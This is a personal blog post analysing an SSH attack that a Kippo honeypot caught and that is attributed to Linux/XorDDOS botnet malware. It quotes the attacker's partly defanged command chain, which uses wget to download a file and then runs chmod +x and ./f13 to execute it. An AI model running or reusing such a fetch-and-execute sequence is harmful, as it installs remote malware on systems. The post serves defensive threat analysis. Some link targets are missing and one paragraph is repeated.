Kippo Honeypot Attack – Linux XorDDOS malware

Click the icon to Follow me:- twitterTelegramRedditDiscord

So I have had my kippo honeypot running for a while and got some pretty good statistics from it. But after a while I got bored and turned it all off.
I decided to fire it back up again and got some interesting hits from
It seems to be trying to execute some Linux/XorDDOS malware according to the guys over at

“…. the post-infection of this malware made the infected machine to act as bot, remotely controlled for malicious process, config, deny IP, daemon and configurations. They are using XOR’ed encryption communication, processes are sent with md5 encoded beforehand. The main function of this malware ELF is for a stealth DDoS attacker botnet.”

As you can see from my SIEM this IP is on the OTX register and its known as malicious
Basic Info of this IP is:-

Guangzhou, China cn

ASN/OWNER:AS58543 Guangdong

FIRST SEEN:Jan. 4, 2016, 8:31 am

LAST SEEN:Jan. 6, 2016, 7:26 am

SSH Kippo Honeypot

So we can see on the SIEM its detected the hits coming in, I’ve allowed the connection to pass the firewall as its going into my DMZ on a specific port.

It connects to the default honeypot admin/123456 login and tries the following command

“#! /bin/sh
PATH=$PATH: /usr/local/sbin: usr/local/bin: /usr/sbin: /usr/bin: /sbin: /bin
wget hXXp:// (i’ve edited it to say hXXP so there isnt a live link)
chmod +x f13

by doing this its trying to to download a file from This IP belongs to a godaddy host. IOFLOD(dot)com

and the chmod +x to give it permissions to then ./f13 to execute it.

One thing to note is that none of this is detected in Kippo-Graph, it only registers the connection from the IP.


The next thing you can see is the below screenshot.

We then get a connection back again and the following commands are executed:-
“ls -la /var/run/”


This sounds very much like the malware they has been torn apart by MalwareMustDie.

The files are also picked up by VirusTotal

It seems to be trying to execute some Linux/XorDDOS malware according to the guys over at

Available for Amazon Prime